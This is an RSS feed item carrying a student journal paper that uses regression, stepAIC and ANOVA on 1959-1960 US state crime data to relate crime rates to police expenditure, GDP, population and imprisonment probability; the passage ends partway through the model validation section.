<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Statistics Archives - Exploratio Journal</title>
	<atom:link href="https://exploratiojournal.com/tag/statistics/feed/" rel="self" type="application/rss+xml" />
	<link>https://exploratiojournal.com/tag/statistics/</link>
	<description>Student-edited Academic Publication</description>
	<lastBuildDate>Mon, 26 Sep 2022 02:19:43 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	

<image>
	<url>https://exploratiojournal.com/wp-content/uploads/2020/07/cropped-Exploratio_icon-1-32x32.png</url>
	<title>Statistics Archives - Exploratio Journal</title>
	<link>https://exploratiojournal.com/tag/statistics/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>United States Crime Data Analysis Using Modern Applied Statistics Methodologies￼</title>
		<link>https://exploratiojournal.com/united-states-crime-data-analysis-using-modern-applied-statistics-methodologies%ef%bf%bc/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=united-states-crime-data-analysis-using-modern-applied-statistics-methodologies%25ef%25bf%25bc</link>
		
		<dc:creator><![CDATA[Adarsh Sasikumar]]></dc:creator>
		<pubDate>Sun, 11 Sep 2022 15:24:32 +0000</pubDate>
				<category><![CDATA[Statistics]]></category>
		<category><![CDATA[crime]]></category>
		<category><![CDATA[data analysis]]></category>
		<category><![CDATA[United States]]></category>
		<guid isPermaLink="false">https://exploratiojournal.com/?p=2148</guid>

					<description><![CDATA[<p>Adarsh Sasikumar<br />
Sri Kumaran Children's Home of Educational Council</p>
<p>The post <a href="https://exploratiojournal.com/united-states-crime-data-analysis-using-modern-applied-statistics-methodologies%ef%bf%bc/">United States Crime Data Analysis Using Modern Applied Statistics Methodologies￼</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<div class="wp-block-media-text is-stacked-on-mobile is-vertically-aligned-top" style="grid-template-columns:16% auto"><figure class="wp-block-media-text__media"><img fetchpriority="high" decoding="async" width="404" height="404" src="https://exploratiojournal.com/wp-content/uploads/2022/09/adarsh.jpeg" alt="" class="wp-image-2262 size-full" srcset="https://exploratiojournal.com/wp-content/uploads/2022/09/adarsh.jpeg 404w, https://exploratiojournal.com/wp-content/uploads/2022/09/adarsh-300x300.jpeg 300w, https://exploratiojournal.com/wp-content/uploads/2022/09/adarsh-150x150.jpeg 150w, https://exploratiojournal.com/wp-content/uploads/2022/09/adarsh-230x230.jpeg 230w, https://exploratiojournal.com/wp-content/uploads/2022/09/adarsh-350x350.jpeg 350w" sizes="(max-width: 404px) 100vw, 404px" /></figure><div class="wp-block-media-text__content">
<p class="no_indent margin_none"><strong>Author: </strong>Adarsh Sasikumar<br><strong>Mentor</strong>: Dr. Hong Pan<br><em>Sri Kumaran Children&#8217;s Home of Educational Council</em></p>
</div></div>



<h2 class="wp-block-heading">Abstract</h2>



<p>While there is a burgeoning research literature on crime trends, much of the extant research has adopted a relatively narrow approach, efforts across studies are highly variable. In this paper, we outline a method to establish the relation between crime rate in the two years of 1959 and 1960 to the political, social and economic factors of that time, whether the crime does depend on the poverty state and mindset of the people in that era. The correlation between crime rate and all the factors being studied is visualized using a scatterplot matrix (SPLOM). Multiple linear regression models under ANOVA framework are performed to evaluate which factors and their interactions affect the crime rates significantly. Hence, what should be done in order to reduce the crime rate and help in the development of the country in all aspects. Statistically, the factors which influence crime rate the most are police expenditure in both the years, Gross Domestic Product (GDP), State population and probability of imprisonment.</p>



<h2 class="wp-block-heading">I. Introduction</h2>



<h4 class="wp-block-heading">A. Background</h4>



<p>Crime is an illegal act which is subjectable to punishment by the government. It involves violating the standard law code prescribed by a country’s parliament and judiciary. It is an unlawful act and a grave offense against human morality. The topic covered in this paper is the data analysis of crimes in the United States. It is a systematic way of detecting and investigating patterns and trends in crime.</p>



<p>The crime in the U.S. has been recorded since the early 1600s. The crime rates have varied over time, with a sharp rise after 1900 and reaching a broad bulging peak between the 1970s and early 1990s. The range of these criminal activities vary from pickpocketing to serial killing and assassinations. The basic aspect of a crime considers the offender, the victim, type of crime, severity and level, and location. These are the basic questions asked by law enforcement when investigating any situation. This information is formatted into a government record by a police arrest report, also known as an incident report.</p>



<p>Society has a strong misconception about crime rates due to media aspects heightening their fear factor. The manner, in which America&#8217;s crime rate compared to other countries of similar wealth and development depends on the nature of the crime used in the comparison. Overall crime statistic comparisons are difficult to conduct, as the definition and categorization of crimes varies across countries. Thus, an agency in a foreign country may include crimes in its annual reports which the United States omits, and vice versa. However, some countries such as Canada have similar definitions of what constitutes a violent crime as America. Overall, the total crime rate is more in the US than it is in other developed countries across Europe.</p>



<h4 class="wp-block-heading">B. Problem Statement</h4>



<p>The criminal behaviour has traditionally been linked to the offender&#8217;s presumed unique motivation which might be various factors such as unemployment, family circumstances due to poverty. It also depends on the dark figure of crime which is the gap between reported and unreported crimes calls the reliability of an official crime statistics into question, but all measures of crime have a dark figure to some degree. The gap in official statistics is largest for less serious crimes. It also varies from region to region or as a matter of fact, state to state. It depends on the type of community living in that region as well. The crime in metropolitan statistical areas tends to be above the national average; however, wide variance exists among and within metropolitan areas.</p>



<p>In this report, we will deep dive into various factors contributing/influencing the rate of crime, which serves as our dependent variable and how it depends on 15 independent variables, which are: % of males aged 14–24, indicator variables for a Southern state, mean years of schooling, police expenditure in 1960 and 1959, labour force participation rate, number of males per 1000 females, state population, number of non- whites per 1000 people, unemployment rate of urban males age 14–24 &amp; 35–39, gross domestic product per head, income inequality, probability of imprisonment, and average time served in state prisons, that affect the rate of crime in a specific category per head population.</p>



<h2 class="wp-block-heading">II. Methodology</h2>



<h4 class="wp-block-heading">A. Descriptive</h4>



<p>In this section, we are going to describe, explore and confirm how the economic, social and political factors are affecting the crime rate using the MASS Library in R.</p>



<figure class="wp-block-image size-large is-resized"><img decoding="async" src="https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.07.57-AM-1024x374.png" alt="" class="wp-image-2149" width="650" height="237" srcset="https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.07.57-AM-1024x374.png 1024w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.07.57-AM-300x110.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.07.57-AM-768x281.png 768w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.07.57-AM-1536x562.png 1536w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.07.57-AM-920x336.png 920w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.07.57-AM-230x84.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.07.57-AM-350x128.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.07.57-AM-480x176.png 480w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.07.57-AM.png 1586w" sizes="(max-width: 650px) 100vw, 650px" /><figcaption><br><em>Table 1 : Variables used in this Model</em></figcaption></figure>



<p>Each row represents a state in the USA and Unit are shown in Table 1.</p>



<figure class="wp-block-image size-large is-resized"><img decoding="async" src="https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.08.27-AM-1024x688.png" alt="" class="wp-image-2150" width="669" height="449" srcset="https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.08.27-AM-1024x688.png 1024w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.08.27-AM-300x202.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.08.27-AM-768x516.png 768w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.08.27-AM-1536x1032.png 1536w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.08.27-AM-920x618.png 920w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.08.27-AM-230x155.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.08.27-AM-350x235.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.08.27-AM-480x323.png 480w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.08.27-AM.png 1732w" sizes="(max-width: 669px) 100vw, 669px" /><figcaption><br><em>Table 2 : Crime Dataset</em></figcaption></figure>



<p>The rate of crime serves as the dependent variable which depends on a number of independent variables such as police expenditure, mean year of schooling, unemployment rate, income inequality, imprisonment probability and so on.</p>



<p>A SPLOM plot is used to show the basic information of the dataset. It is a collection of scatter plots being organized into matrix. It gives us the direction, strength, and linearity of the relationship between the dependent and independent variables and also helps in determining the correlation between the independent variable and dependent variable as seen in the Figure 1.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="660" src="https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.09.04-AM-1024x660.png" alt="" class="wp-image-2151" srcset="https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.09.04-AM-1024x660.png 1024w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.09.04-AM-300x193.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.09.04-AM-768x495.png 768w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.09.04-AM-1536x990.png 1536w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.09.04-AM-920x593.png 920w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.09.04-AM-230x148.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.09.04-AM-350x226.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.09.04-AM-480x309.png 480w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.09.04-AM.png 1614w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption><br><em>Figure 1 : SPLOM Plot with All Variables</em></figcaption></figure>



<h4 class="wp-block-heading">B. Exploratory:</h4>



<p>The data is first explored and wrangled to check for the presence of outliers and those which are present are removed.</p>



<p>The potential correlation between the variables is further evaluated via analysis by 14 simple regression models, to examine which independent variables are significant factors. Based on this set of simple regression models, 4 variables are chosen which have a statistically significant correlations with the dependent variable Crime Rate.</p>



<p>Regression is used to predict a continuous outcome based on one or more continuous predictor variables. Regression line is the straight line passing through the data that minimizes the sum of the squared differences between the original data and the fitted points.</p>



<p>An aov (analysis of variance) model is performed to check the interrelation between the 4 independent variables from the simple regression model. This analysis is performed iteratively on the various combinations in which the least significant combination (the one with highest p value) is removed after each step. Multiple regression analysis is performed on these 4 independent variables with respect to the dependant variable that is crime rate.</p>



<h4 class="wp-block-heading">C. Confirmatory:</h4>



<p>ANOVA model is used for deciding the best multiple regression model among the given combination of the 4 independent variables. ANOVA and step aic are used to find out the interdependency between the 4 variables. Likelihood ratio test is performed to check goodness of the fit of the nested regression models.</p>



<p>ANOVA is fundamental for all statistical approaches. ANOVA, which stands for Analysis of Variance, is a statistical test used to analyses the difference between the means of more than two groups.</p>



<p>ANOVA is used in the analysis of comparative experiments, those in which only the difference in outcomes is of interest. The statistical significance of the experiment is determined by a ratio of two variances. This ratio is independent of several possible alterations to the experimental observations: Adding a constant to all observations does not alter significance. Multiplying all observations by a constant does not alter significance.</p>



<p>A one-way ANOVA uses one independent variable, while a two-way ANOVA uses two independent variables.</p>



<p>In ANOVA, the null hypothesis is that there is no difference among group means. If any group differs significantly from the overall group mean, then the ANOVA will report a statistically significant result.</p>



<p>So, ANOVA statistical significance result is independent of constant bias and scaling errors as well as the units used in expressing observations. This makes it the ideal model.</p>



<p>We use ANOVA, when we want to test a hypothesis. From our 3 models of different combinations, we choose the model (independent variables) with maximum influence on the dependent variable that is crime rate as an ideal model. Finally, the model with all 4 variables is plotted. Following this, the best model is chosen from all the 3 models.</p>



<p>The likelihood-ratio test compares the goodness of fit of two nested regression models based on the ratio of their likelihoods, specifically one obtained by maximization over the entire parameter space and another obtained after imposing some constraint. A nested model is simply a subset of the predictor variables in the overall regression model.</p>



<h2 class="wp-block-heading"><strong>III. Results</strong></h2>



<h4 class="wp-block-heading">A. Descriptive</h4>



<p>In this section, we will be depicting the various results of our analysis of regression and ANOVA Models.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="584" src="https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.10.27-AM-1024x584.png" alt="" class="wp-image-2152" srcset="https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.10.27-AM-1024x584.png 1024w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.10.27-AM-300x171.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.10.27-AM-768x438.png 768w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.10.27-AM-1536x876.png 1536w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.10.27-AM-920x524.png 920w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.10.27-AM-230x131.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.10.27-AM-350x200.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.10.27-AM-480x274.png 480w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.10.27-AM.png 1670w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption><em>Figure 2 : Correlation</em></figcaption></figure>



<p>From Figure 2, we can see that police expenditure in 1959 and 1960 have high correlation with one another. This condition is not ideal for linear regression because no predictor variable should strongly correlate with one another, hence we are combining both into a single variable.</p>



<h4 class="wp-block-heading">SPLOM PLOT</h4>



<p>As we can see for police expenditure, state population and gdp vs Crime Rate from Figure 3, the data points are closer to the line moving in the upward direction indicating a strong positive linear relationship with crime rate. Similarly, for probability of imprisonment, it is in the downward direction indicating a strong negative relationship with Crime Rate.</p>



<p>From the plot, we can see that four independent variables with most correlation with the Crime Rate is Police expenditure, GDP, Probability of imprisonment and State Population.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="526" src="https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.11.21-AM-1024x526.png" alt="" class="wp-image-2153" srcset="https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.11.21-AM-1024x526.png 1024w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.11.21-AM-300x154.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.11.21-AM-768x395.png 768w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.11.21-AM-1536x790.png 1536w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.11.21-AM-920x473.png 920w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.11.21-AM-230x118.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.11.21-AM-350x180.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.11.21-AM-480x247.png 480w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.11.21-AM.png 1708w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption><br><em>Figure 3 : SPLOM Plot with 4 Variables</em></figcaption></figure>



<h4 class="wp-block-heading">B. Exploratory:</h4>



<p><strong><em>Data Wrangling</em></strong></p>



<p>In Figure 4, the data is plotted with and without outlier.</p>



<p>The predictor variable during a simple linear regression must always have high linear relationships with target variables. So, for this data we need to first check for the presence of an outlier and if there are any, we must remove them.</p>



<p>If we look at the abline of the plot, we can see that the outliers of our data have a high influence over our model. Therefore, it is safer to remove the outliers from the data. The removal of outliers increases the R-squared of the model ~0.6 points, and the p value has decreased along with the value of intercept which shows the removal of outlier improves the model.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="997" src="https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.12.39-AM-1024x997.png" alt="" class="wp-image-2154" srcset="https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.12.39-AM-1024x997.png 1024w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.12.39-AM-300x292.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.12.39-AM-768x748.png 768w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.12.39-AM-920x896.png 920w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.12.39-AM-230x224.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.12.39-AM-350x341.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.12.39-AM-480x468.png 480w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.12.39-AM.png 1308w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption><br><em>Figure 4 : Data Wrangling</em></figcaption></figure>



<p>A simple linear regression model is estimated for each of these 14 independent variables and their result has been tabulated below.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="910" src="https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.13.22-AM-1024x910.png" alt="" class="wp-image-2155" srcset="https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.13.22-AM-1024x910.png 1024w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.13.22-AM-300x267.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.13.22-AM-768x682.png 768w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.13.22-AM-920x817.png 920w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.13.22-AM-230x204.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.13.22-AM-350x311.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.13.22-AM-480x426.png 480w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.13.22-AM.png 1254w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption><em>Figure 5 : Simple Regression</em></figcaption></figure>



<p>From these simple regression models, we can conclude that the relation between police expenditure, GDP, probability of imprisonment, state population and crime rate is highest as their p value is less than 0.05 with r being 72% ,44% ,43% and 36% respectively. So, with these 4 variables, a multiple regression and stepAIC is plotted. As next step, ANOVA is used to find the best model.</p>



<h4 class="wp-block-heading">C. Confirmatory:</h4>



<p><strong><em>Interrelation between variables using multiple regression and stepAIC</em></strong></p>



<p>AOV is performed to check which variables among the 4 variables have the most interrelation amongst one another and hence affect the crime rate.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="833" src="https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.14.20-AM-1024x833.png" alt="" class="wp-image-2156" srcset="https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.14.20-AM-1024x833.png 1024w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.14.20-AM-300x244.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.14.20-AM-768x625.png 768w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.14.20-AM-920x749.png 920w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.14.20-AM-230x187.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.14.20-AM-350x285.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.14.20-AM-480x391.png 480w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.14.20-AM.png 1246w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption><br><em>Figure 6 : Result of Interrelation &#8211; </em>4 Variables</figcaption></figure>



<p>Multiple regression and stepAIC are performed for the 4 interdependent variables as shown in Figure 7</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="686" height="1024" src="https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.14.58-AM-686x1024.png" alt="" class="wp-image-2157" srcset="https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.14.58-AM-686x1024.png 686w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.14.58-AM-201x300.png 201w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.14.58-AM-230x343.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.14.58-AM-350x522.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.14.58-AM-480x716.png 480w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.14.58-AM.png 724w" sizes="(max-width: 686px) 100vw, 686px" /><figcaption><em>Figure 7 : Model I &#8211; crime_rate ~ pol_exp * gdp * prob_imp * state_pop</em></figcaption></figure>



<p>The highest p value (gdp:state_pop and gdp) are iteratively removed and performed multiple regression and stepAIC as shown in Figure 8 and 9</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="747" height="1024" src="https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.15.30-AM-747x1024.png" alt="" class="wp-image-2158" srcset="https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.15.30-AM-747x1024.png 747w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.15.30-AM-219x300.png 219w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.15.30-AM-768x1052.png 768w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.15.30-AM-230x315.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.15.30-AM-350x480.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.15.30-AM-480x658.png 480w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.15.30-AM.png 778w" sizes="(max-width: 747px) 100vw, 747px" /><figcaption><em>Figure 8 : Model II &#8211; crime_rate ~ pol_exp * gdp * prob_imp * state_pop – (gdp:state_pop)</em></figcaption></figure>



<figure class="wp-block-image size-large is-resized"><img loading="lazy" decoding="async" src="https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.16.08-AM-703x1024.png" alt="" class="wp-image-2159" width="637" height="928" srcset="https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.16.08-AM-703x1024.png 703w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.16.08-AM-206x300.png 206w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.16.08-AM-768x1118.png 768w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.16.08-AM-230x335.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.16.08-AM-350x510.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.16.08-AM-480x699.png 480w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.16.08-AM.png 890w" sizes="(max-width: 637px) 100vw, 637px" /><figcaption><em>Figure 9 : Model III &#8211; crime_rate ~ pol_exp * gdp * prob_imp * state_pop – (gdp:state_pop) &#8211; gdb</em></figcaption></figure>



<p>ANOVA is performed to check the best model.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="302" src="https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.17.00-AM-1024x302.png" alt="" class="wp-image-2160" srcset="https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.17.00-AM-1024x302.png 1024w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.17.00-AM-300x89.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.17.00-AM-768x227.png 768w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.17.00-AM-920x272.png 920w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.17.00-AM-230x68.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.17.00-AM-350x103.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.17.00-AM-480x142.png 480w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.17.00-AM.png 1294w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption><br><em>Figure 10 : ANOVA Model</em></figcaption></figure>



<p>ANOVA <br>Likelihood ratio test is performed on the 3 nested models, since the p value is greater than 0.05 as seen in the figure, we have to accept the null hypothesis which means there is not much difference between the models and the best fit is the first model (pol_exp * gdp * prob_imp * state_pop)</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="307" src="https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.17.39-AM-1024x307.png" alt="" class="wp-image-2161" srcset="https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.17.39-AM-1024x307.png 1024w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.17.39-AM-300x90.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.17.39-AM-768x231.png 768w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.17.39-AM-920x276.png 920w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.17.39-AM-230x69.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.17.39-AM-350x105.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.17.39-AM-480x144.png 480w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.17.39-AM.png 1286w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption><em>Figure 11 : Likelihood Ratio Test</em></figcaption></figure>



<h4 class="wp-block-heading">D. Model Validation</h4>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.18.16-AM.png" alt="" class="wp-image-2162" width="568" height="200" srcset="https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.18.16-AM.png 966w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.18.16-AM-300x106.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.18.16-AM-768x272.png 768w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.18.16-AM-920x326.png 920w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.18.16-AM-230x81.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.18.16-AM-350x124.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.18.16-AM-480x170.png 480w" sizes="(max-width: 568px) 100vw, 568px" 